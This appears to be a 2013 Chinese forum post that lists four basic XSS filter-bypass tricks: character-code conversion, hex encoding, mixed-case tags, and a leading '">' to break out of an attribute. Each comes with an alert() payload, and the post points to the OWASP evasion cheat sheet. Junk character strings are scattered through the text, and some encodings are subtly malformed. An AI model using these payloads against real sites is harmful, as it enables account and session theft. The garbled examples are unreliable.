四种超级基础的绕过方法。+ P7 R% }' F5 w r* S& O+ w2 ~
1.转换为ASCII码$ w0 i2 a( V) m* b* ~
例子:原脚本为<script>alert(‘I love F4ck’)</script >) p& D* ]+ U k7 M1 I
通过转换,变成:* B! v# R# v+ K
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
6 P& j( P2 ^/ d3 Q 5 K4 X. p6 ?. Z! e7 X& j/ Z
2.转换为HEX(十六进制)2 Y0 w$ h" i3 q: `; ], j# }+ N
例子:原脚本为<script>alert(‘I love F4ck’)</script>4 E0 i& F* S9 z, u; `
通过转换,变成:4 d& f0 }4 K( m; S
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
/ a8 O% ]" X3 X: d% x5 L/ f# _! [' @
7 b* J! m* q U& n# P3.转换脚本的大小写# u, L* K G+ j
例子:原脚本为<script>alert(‘I love F4ck’)</script>
: A& h. J4 E( `) L9 K# _. o4 I转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>& N- L% a* a9 _. E, m
: I, ]% H& V4 b. d4 X# N0 y
4.增加闭合标记”>
\: |( ]; Q3 _: |- q2 y; ]' T) C例子:原脚本为<script>alert(‘I love F4ck’)</script>
* ^: e- H! I% c: i5 N转换为:”><script>alert(‘I love F4ck’)</script>
# C2 {6 V" N( K6 o @8 L" |更详细绕过技术请参考此网页5 i1 a- J# u5 `0 Y
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet& p" P8 b" z, b; b* z; K. B: L
T/ Y/ w$ i0 L& W
转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对